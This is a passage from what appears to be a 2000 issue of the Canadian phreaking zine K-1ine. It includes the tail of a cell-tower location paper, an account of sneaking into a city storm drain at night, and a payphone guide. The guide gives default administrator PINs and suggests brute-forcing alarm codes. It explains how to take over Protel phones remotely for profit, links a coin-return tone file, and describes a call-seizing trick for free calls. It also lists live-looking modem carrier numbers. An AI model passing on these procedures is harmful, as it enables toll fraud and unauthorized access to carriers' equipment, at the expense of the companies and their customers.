the resultant vectors will cross vectors describing the boundaries of the
cell. Should an extension move the cell into a zone served by another base
station, reverse the sense of the vector and reproject. Connecting the zone
crossings and extrapolating will establish a corridor in which it may be said
with a high degree of certainty that a base station is located. Position
within the corridor may be established by way of signal strength and PN/CGI
indicators. All that remains is to travel the corridor until the cell is
within visual range.

--== RDF Approximation/Optimization ==--

[image] 1) The following method optimizes search complexity at the expense of
time and resource requirements.

By plotting signal strengths at regular intervals (street intersections, for
example) over a large enough area, perhaps 10 km^2 and connecting the
appropriate points (ie. by average signal strength or by cell ID) it becomes
possible to narrow cell locations to a small area. The inefficiency of this
method lies in the requirement for a large amount of travel and that the
plotted points (if not chosen correctly) may only converge very slowly if at
all. This method is recommended for mapping microcells in congested "antenna
jungles," and as a bootstrap for other methods.

--== ==--

[image] 2) The following method optimizes search complexity and time at the
expense of accuracy and possibly resource requirements.

Once a cell boundary is located, a flattened spiral search takes place. Simply
travel along the cell line, reversing direction after F(n) units of travel,
where F(n) is the nth Fibonacci number[3], n is the number of the turn, and
one travel unit is 200m. Since F(8)=13, the 8th pass along the line will be
1.6km, more than long enough to establish the true direction of the cell.
Disadvantages include the fact that the resultant location may be difficult to
access, improbable or incorrect, further compounded by the difficulties of
staying on the cell line. That accounts for most of the wasted travel, since
the Fibonacci search is naturally efficient. This method is recommended for
open but complicated areas like refineries where it may not be obvious in
which direction the cell lies, due to the "cleverness" of some site engineer.

Other useful search techniques will be posted as they are described.

--== RDF References ==--

[1] Far Side. You know the one - "What we say, what dogs hear."
[2] http://www.geckobeach.com/cellular/
[3] F(i+1)=F(i)+F(i-1). F(0)=0, F(1)=1. F(x) -> 0, 1, 1, 2, 3, 5, 8, 13, ...
[image] Images accompanying this paper (and the latest html version) can be
found at http://www.edmc.net/~wargames/df-paper.html

---

Monday July 3rd 2000 - Our First Exploration in a Downtown Drain
______________________________________________________________________

Magma and I decided it was time to go and explore. Being new at
this, we weren't exactely sure where to start. Since exploring a
building is rather risky to begin with, we thought a drain is a
realatively safe place for a couple of new explorers to check out.
After a couple weeks, Magma spotted a nice drain Drain we could
possibly explore.

So, we had the drain figured out, we next had to plan up how to
enter and what to bring on this little expedition. Magma brought a
maglight, and, I brought along another maglight, and the camera around
my neck. Since this was a drain, we had to wait for a day when there
was no percipitation so water level of the drain was fairly shallow
for us to walk in. Also, for safety sake, being downtown, the safest
time to not be spotted in this activity would be to go at night. Magma
added the note that we travel the drain at around 11pm. The reason for
this is that teenagers walking around that time of night is not nearly
as suspicious as teenagers downtown at like 3am.

It is now July 3rd, and Magma and I decided this night is as good
as any to begin exploring. Boy, were we in for a surprise. Magma had
driven us to a restaurant a few blocks off the drain, and we walked to
the drain from there. To aviod arousing suspicion, we changed into our
draining gear (rubber boots, and shorts) at a parking garage with a
bathroom across the street from the drain. Once at the drain, we
slipped into the channel, and began walking into the tunnel. At first
glimpse we expected the drain to just get smaller, and close into a
wall or something. Instead, the tunnel took us along a few turns,
never seeming to end. As we walked, we could only see but 30 or 40
feet ahead from our flashlights and after that, pitch black. Along our
travels, we came across an orfice [image] door. I quickly got closer,
and peered inside which forms a new tunnel to lead us elsewhere. I
went inside, and was quickly stopped by large pipes blocking my
travels. After climbing below and above them, I decided I wasn't
getting anywhere, and returned to the opening where Magma was waiting
for me.

As we walked through the cool water in the tunnel, to our
surprise, we were constantly being hit by fish that were swimming in
this water. At sometimes, Magma and I were being tripped up by these
fish, that were hard to avoid, considering the number of them. Another
pest on our trip were the number of spiderwebs we walked through.
Nevertheless, we were still enjoying ourselves and continued along the
tunnel. About 20 minutes through the drain, we came along another
rather large tunnel. tunnel Both Magma and I detoured through it, only
coming to a stop by a large steel grate. Having only flashlights, and
a camera, we had no choice but to turn around, and continue through
the main drain. Tunnel We came across a few more larger drains, but
decided to continue on through the main drain. After about 45 minutes,
we came closer to the sound of rushing water, and then a dim light. As
we travelled closer, the light grew brighter, and the rush of water
more intenese, and louder. At this point, we did not want to take the
chance of being seen, so we turned off the maglights and walked to
towards the light in front of us. pumping station To our
disappointement, we came to the end of tonight's journey. What lay
ahead was the light of streetlights. A large steel grate blocked us
from exiting the tunnel into the water pump stations. Already
statisfied with what we had found and explored, we decided it was best
for us to return back through the main drain, and back home.

The trip back was very quick. Since we were now walking with the
current, our speed was signifcantly faster, and also, now that we were
familiar with the area, we needn't be so slow, and cautious of what's
ahead. We made it back out of the drain, climbed up out of the
channel, and changed back into normal clothes at the parking garage.
We then got back into Magmas car, and returned home after a great trip
of what shall be one of many more drains to explore.

Reference: (with image) http://internettrash.com/users/mtghu/drain01.htm

---

<S3mt3x> Well would you look at all the happy people....
� cyb0rg_asm/#haxordogs looks
� theclone grins happy-like
<S3mt3x> Do you see 'em cyb0rg_asm are they still shining?
<cyb0rg_asm> yes, shiny.

��

'The Comprehensive Guide to Paytel Canada payphones'

Written by: The Clone
On Friday July 14, 2000

��

__________
./_CONTENTS_\.
` `

.; Disclaimer

.; PayTel Canada offices

.; Protel Model Phones

.; Intellicall Model Phones

.; Resources

.; Conclusion

.; Contact

.; Shouts
_,_

Disclaimer --

Within the pages of this document is information pertaining to the
technological ins and outs of a huge chunk of the payphone market in Canada.

I am by no way responsible for any damage someone or somebody causes by reading
this document. If you want to break something and risk a fine or prison time,
by all means leave me the hell out of it. In other words, if I in some way AM
contributing to that slight increase in Canadian youth crime, I don't take
responsibility for it. So please, use this information to learn and grow and
not to piss off your phone company, the police department, or national defense.

_-_

'PayTel Canada offices'

Several months ago, in my document titled 'The Complete Guide to the
Elcotel Payphone' I listed off every Corporation that currently has an
account with Elcotel; this included specific account information in
alphabetical order. From what I assume, that information was deemed useful
by my readers so for that I've taken a similar approach with this section.

For now, here is a list of every PayTel office in Canada in order from west to
north - just a good resource for Canadian phreakers who may be interested in
this company.

Paytel's national head office is located in Surrey, British Columbia,

with the following branch offices in:

Alberta (Calgary), Ontario (Toronto, Markham), Quebec (Mirabel),
New Brunswick (Moncton) and Nova Scotia (Dartmouth).

Western Canada (Head Office)
2428 King George Hwy
Surrey, BC V4P 1H5
Tel: (604) 542-2010
Fax: (604) 542-2011
Toll-free: 1-877-542-2010

Ontario Region
6 Adelaide Street East
Suite 500
Toronto, ON M5C 1H6
Tel: (416) 504-7400
Fax: (416) 504-7211
Customer Service: 1-800-265-2953
info@paytelcanada.com

Quebec Region
17,000, rue Charles
bureau 100
Mirabel, PQ J7J 1X9
Tel: (405) 433-0001
Fax: (405) 433-1303
Toll-free: 1-877-433-3553

Eastern Region
201 Brownlow Avenue
Unit 57
Dartmouth, NS B3B 1W2
Tel: (902) 468-1716
Fax: (902) 468-1717
Toll-free: 1-877-575-7555

_-_

'Protel Model Phones'

Protel, Inc. of Lakeland, Florida is North Americas leading manufacturer
of smart public payphones. In 1984 Protel introduced the first line-powered
smart payphone in the USA. Protel were one of the first key-players in the
development of the first Customer Owned Customer Operated Telephones (COCOT)
in the early 1990's, and have strived to bring quality yet cost effective
phones to millions of people around the globe.

Protel develops several payphones, though only having slight differences
between them, which are unique and interesting to mess around with for
a couple of obvious reasons; interaction with the phones' diagnostic -
statistical information is possible by using a series of secret codes,
and physical/remote security is fairly weak. This is just the type of
thing any telephone enthusiast loves to read.

Note:

I haven't personally found an abundant amount of these payphones within
Edmonton in comparison to the Intellicall model phones, but keep in mind,
the telecommunications industry is an ever-changing one so who knows what
to expect in the next six months or so. Keep your eyes peeled and lemme
know if you find any Protel Model payphones in your area.

PayTel Canada's Protel Phone
----------------------------

This is one of the few widely distributed Protel phones in Canada:

http://home.edmc.net/~theclone/protel.jpg

Payphones and Accessories
-------------------------

http://www.protelinc.com/PROTELInt/payphone/Fpayph.htm

Protel Locations
----------------

Restaurants - Truck Stops - Schools - Service Stations - Churches -
Airports - Bowling Alleys - Night Clubs - Bingo Parlors - Resorts -
Low-income Housing - Convenience Stores - Apartments - Bars - Lounges
- Hotels - Motels

Features
--------

- When dialing a call on a Protel phone, the phone slowly dials each digit
while it waits for you to finish dialing or finish paying. You'll be able
to hear this in the background, but it is often quiet so open your damn ears!

- Leaving a Protel receiver off the hook for too long will cause the phone
to produce an interesting beeping sound.

- Credit Card slots; some of these phones DO have credit card slots which
accept many major credit cards (ie. Visa, Mastercard, e.t.c).

- Internal Alarms; can be disabled by entering *# and the correct two to four
digit pin code, most likely in default mode and easily bruteforceable.

- Ringers; Protel model phones will most often ring when called.
After five rings a modem carrier will pick up which is sometimes
followed by an automated voice that reads off how much money is in the
phone including the date/time.

Special Features
----------------

- A particularly special feature about the Protel model payphones are the
unique Protel-only *# options that allow any phreaker to learn about the
phones' internal information simply by entering a few codes.
Here are the *#6X codes I'm aware of at this present time:

` *#61 should give you ANI information

` *#62 will ID the software version the phone is utilizing

` *#65 sometimes discloses the phones company's HQ modem number
- in Canada the modem carrier number would belong to PayTel Canada.

` *#68 disables the phone all together

! Tip: by hand-scanning other *# codes (ie. *#0X, *#1X, *#2X, e.t.c.)
you may find more neat options like the ones noted above.

Remote Administration Software
------------------------------

Expressnet - ftp://208.49.251.4/Xv150.exe - (official Protel software)

ftp://208.49.251.4/XnetV151.exe - ""

Panorama - http://filexfer.tripod.com
Pronet - http://www.protelinc.com/PROTELInt/pronet/fpronet.htm

Security Issues
---------------

'Physical Administration'

To my knowledge there are two ways to gain physical administrative powers
on a Protel model payphone, the first way is somewhat easier.

Here's what you do;

` Enter *# and then the correct four digit admin PIN code which are most likely
defaults such as: *#1234, *#5555, *#9999, and so on. Once you enter the
correct PIN code you will have total access to all menus, rate tables,
and will have the ability to alter restrictions on what phone numbers
can be dialed.

` The second way is quite a bit more difficult but is successful nonetheless.
After entering the correct two to four digit *# alarm code, and opening
the phone with the proper keys, you will notice a 'setup' button on the
printed circuit board.

Press the button and immediately you'll be prompted for the correct PIN code.

` Enter *#000000 (6 digits) - at this point you will have total access to
all menus, rate tables, including the ability to alter restrictions on
what phone numbers can be dialed.

'Remote Administration'

Remote Administration of the Protel phone can be both enjoyable and
profitable, if done correctly. In this section, I'll be explaining step by
step on how to successfully take over a payphone or many payphones by
using just a computer with a modem and the proper software.

The first thing you'll need in order to successfully take over a Protel
payphone remotely is the particular payphone's phone number. This can be
accomplished by either writing down the phone number listed on the phone,
or by entering *#61 with the receiver off the hook.

Secondly, you're going to need the right payphone administration software.
Remember; some software which might work for administering one payphone may
not necessarily work for another. The reason for this is that some
software just isn't compatible with the payphones' chip, making it impossible
to even connect to the phone correctly.

Another reason may be that the software you're using doesn't allow you to
enter the necessary number of digits that would be required of you when
prompted for the PIN code. In this case, you'll need software that allows
you to enter a 6-8 digit payphone admin PIN.

The PIN code; because of the fact that most payphone administration PIN codes
(by default) are a series of numbers with only one number and 6-8 digits,
and if we remember that the internal physical administration PIN for the
Protel is *#000000, I would say that the default PIN for all Protel phones
is likely an easy guess.

'Audio File coin return exploit'

Many of the Protel payphones throughout eastern Canada and parts of the
United States which are owned and operated by Bell (called BOCUT's) are
vulnerable to a particularly interesting form of phone fraud.
This vulnerability will allow anyone on one of these phones to make a
local call and then get their money spit back into the coin return.

Now as some of you may already know, as a service provided to ensure customers
aren't being ripped off when they insert that 25/35� for a call, phone
companies have what they call a "coin return policy".

This policy states that if a customer inserts his/her money for the call
but are unable to complete the call due to technical problems on the part of
the CO, then the operator must empty out the appropriate change. Now adays
with the advent of new telecom based technologies, all an operator would
be required to do is play a specific frequency into the receiver to
subsequently cause the phone to empty.

What I'm getting to is this; if anyone on a regular quality land-line was to
be called by someone on a Protel model BOCUT, and then the person on the
land-line was to play the coin-return frequency, they could quite possibly
automate what any operator has the power to do. This little exploit is
known as the 'Green Box', but alt.phreaking's 'Cyber Thief' coined this the
'Protel-Box' for the obvious reason that it only works on Protel model phones.

DIY, baby:

==> <==
The frequency in '.WAV' format: http://home.edmc.net/~theclone/freecall.wav
==> <==

Canadian Distributors
---------------------

C. G. Industries Limited
30 Shields Court
Markham, Ont. L3R8V2
Phone: 905-475-5093
Fax: 905-475-5389
http://www.cgil.com

International Connectors & Cable, Inc. (ICC)
16918 Edwards Rd.
Cerritos, CA 90703-2400
Phone: 562-926-0734
Fax: 562-926-5290
Toll Free: 1-800-333-7776
http://www.icc-payphone.com

Palco Telecom, Inc.
7825 Flint Road S.E.
Calgary, Alberta T2H 1G3
(800) 661-1886
(403) 255-4481
Fax: (403) 259-0101
http://www.palcotel.com

Pay Phone Technologies
80D Centurian Drive Unit 8
Markham, ON L3R 8C1
905-947-8216
Fax: 905-947-8209
Toll Free: 1-877-488-0041
http://www.foc-ppt.com

-`-

'Intellicall Model Phones'

`` Using advanced technology and the experience of over
12 years in the industry, Intellicall produces two payphone models
that may both be customized with a variety of options to meet the
demands of your locations. The UltraTel payphone is the economical
workhorse of the industry for those installations that use AC power.
The AstraTel payphone is the proven answer where line power is preferred.
Both are highly robust systems that deliver the long term reliability
required in any successful payphone network. ''

Paytel Canada's Intellicall Phone
---------------------------------

Paytel Canada distributes this model of payphone by Intellicall called
the AstraTel 2:

http://home.edmc.net/~theclone/astraltel2.jpg

Intellicall: 'AstraTel & Ultratel' Audio Samples
---------------------------------------------------

http://www.payphone-directory.org/sounds/wav/web/intvoice.wav
http://www.payphone-directory.org/sounds/wav/web/intavoice.wav
http://www.payphone-directory.org/sounds/wav/web/a.wav
http://www.payphone-directory.org/sounds/wav/web/intring.wav

Payphones and Accessories
-------------------------

http://www.universal-comm.net/intell.htm

Intellicall Locations
---------------------

Features
--------

[On UltraTel Models]

- After Approximately five rings, a modem carrier will pick up

- Some models of this phone have a scrambled keypad, that is,
when you dial a number, the tones you hear don't match the
numbers you push. After a call is completed, the scrambling ends.

- This phone requires an AC power source to function properly.

- During a call, it will take your money as soon as it thinks
the call is answered. If it is left off the hook too long it will say:
"Please hang up and try again."

[On AstraTel Models]

- After Approximately five rings, a modem carrier will pick up

- It has a 14,400 baud modem, which is very fast for a pay phone.
It runs only on phone line power. If you don't deposit enough for a call,
you will be told to just deposit the difference.

- if you leave this phone off hook too long it will generate a fake fast
busy signal.

Special Features
----------------

Toll Fraud Prevention --

The fraud prevention is this: if you call your friend on an Intellicall
phone (UltraTel & AstraTel models) and your friend answers, the phone will
automatically dial '111'. If you were to call this phone from either the
payphone next to it or from a cellphone; have it ring once, pick it up and
then hang up, and pick it up again you'd get an unrestricted dial tone which
would allow you to use a tone dialer (since the keypad is temporarly disabled)
to make free local calls.

The auto-111 DTMF tones override the dialtone, thus preventing toll-fraud.

Security Issues
---------------

- Internal Alarm Bruteforcing -

Internal Alarm Bruteforcing can be done by firstly entering pound then
a four digit PIN. Because of previous problems involving the disclosure
of alarm codes, I will not be posting it on this article.

Too many people were abusing the #CPC code that was mentioned on the
'Complete Guide to the Elcotel Payphone', and because of that Canada Payphone
changed the PIN and set up a trap (at least in Edmonton) which automatically
caused the phone to dial out for help.

If you wish to bruteforce the PIN then all the power to you.

'Phone Seizing Problems - will give free phone calls'

Well whaddya know, the very same exploit I discovered on the Elcotel 9520C
model payphones works on the Intellicall model payphones as well.
When will these payphone developers and their distributors ever take their
security seriously? The answer is; until the specific fraud being committed
has reached such prevalent levels that the chance of a yearly revenue is slim
to none.

Using a twenty dollar Genexxa 33-Number Memory Pocket Tone Dialer from Radio
Shack, one can easily take advantage of Paytel's incompetence in relation
to call seizing.

-- Typical Scenario --

CALL TO PAYTEL CANADA

Operator: Paytel Canada, how may I help you?
Phantom Phreak: Yes, may I have the number for directory assistance?
Operator: Just a moment...
Phantom Phreak: Thank-you.
Operator: 1-877-542-2010
Phantom Phreak: No no no, thank-you!

Operator Hangs Up *
Phantom Phreak is dropped to an unrestricted line, and then proceeds to

play his pre-programmed 7 digit DTMF tones into the receiver allowing him
a free local call. *

Useful Numbers:

The keypad isn't disabled when using these local numbers,
meaning you will not need to go through the trouble of using a tone-dialer:

* 0
* 411
* 611
* 811
* 911 (?)

| see: 'SKANNING' at www.nettwerked.net for a listing of thousands of these: |

Blocked From Area - Will eventually drop you to an unrestricted line
Call Cannot Be Completed - Will eventually drop you to an unrestricted line
Disconnected - Will eventually drop you to an unrestricted line
Not In Service - Will eventually drop you to an unrestricted line
Unsuccessful VMB Login Attempts - will usually drop you to an unrestricted

line after several unsuccessful login attempts (not recommended)

Modem Carrier Numbers (AstraTel 2):

519-576-0354 - Kitchener, Ontario, Canada
780-483-9783 - Edmonton, Alberta, Canada
780-456-9983 - 127St/139Ave: Edmonton, Alberta, Canada
905-453-9794 - Halifax, Nova Scotia, Canada (corner of Robie and Young streets)

'Resources'

Resources list -

URL's of web-sites that helped me with the R&D for this document:

-+ GHU - The Grasshopper Unit: http://internettrash.com/users/mtghu/
-+ Intellicall Inc: http://www.intellicall.com/
-+ Pay Phone Directory: http://www.payphone-directory.org
-+ PayTel Canada: http://www.paytelcanada.com/
-+ Protel Inc: http://protelinc.com
-+ Protel Inc (ftp): ftp://protelinc.com
-+ Tatung Telecom: http://www.tatungtel.com/

'Conclusion'

I'd firstly like to thank some people who helped directly and indirectly
with the creation of this document: Cyber Thief, Magma, Miklos, and RT.

Secondly:

Oh you big scary Telecom companies popping up everywhere trying to make
a buck (or should I say 'quarter') off the slowly dying payphone industry
in Canada, without ever paying attention to security. I'm not going to
chant about how you guys should INCREASE your security. See that's just
something honest 'white hat' folks do. The more you make it easier for the
Canadian phreakers to exploit you physically and remotely, the better.
Although I don't mind a challenge every now and again... or do I?
All this STUFF just comes so easily to me... tee-hee.

Def Con 8:

YES! Hack Canada and several of their Canadian friends will be attending
Def Con 8 this year for some good 'ol fashion fun! This will be Hack Canada's
second year attending this crazy Las Vegas conference, and we plan on having
a few surprises for all you people. Look for a lot more pictures and
reviews this year - hell just look for us and share your beer, eh.

PeAcE OuT...

_ Contact me _

E-mail: theclone@nettwerked.net
ICQ: 79198218
IRC: haxordogs.net [#haxordogs, #nettwerked]
URL - http://www.nettwerked.net

Shouts:

Hack Canada & Haxordogs

A
P R E - D E F C O N
2 0 0 0
R E L E A S E

---

Credits:

I would like to give credit to the following people for helping with this
issue of K-1ine - if it wasn't for you guys I don't think this issue would of
been released.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
4ncifer, Eric Knight, Magma/Miklos, PsychoSpy, Untoward,
and lastly to Wargames
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Thanks you guys, seriously. I'm very happy to see all the contributions.

Remember: Articles are ALWAYS welcomed. If you have something you'd like to
see on this zine, feel free to send me an e-mail. Even if you're worried
that the article is "lame" or "isn't technical" or something like that,
send it anyways.

Remember: everyone has something to offer to the scene. Show your support.

Shouts:

Hack Canada (www.hackcanada.com) and Haxordogs (www.haxordogs.net),
k-rad-bob @ b0g (www.b0g.org), #2600ca crew, Ottawa 2600; mainly Kybo_Ren, RT,
The Non-Existent Crew, lastly to everyone and anyone who gives a shit
about the Canadian H/P scene.

A
N E T T W E R K E D
P R O D U C T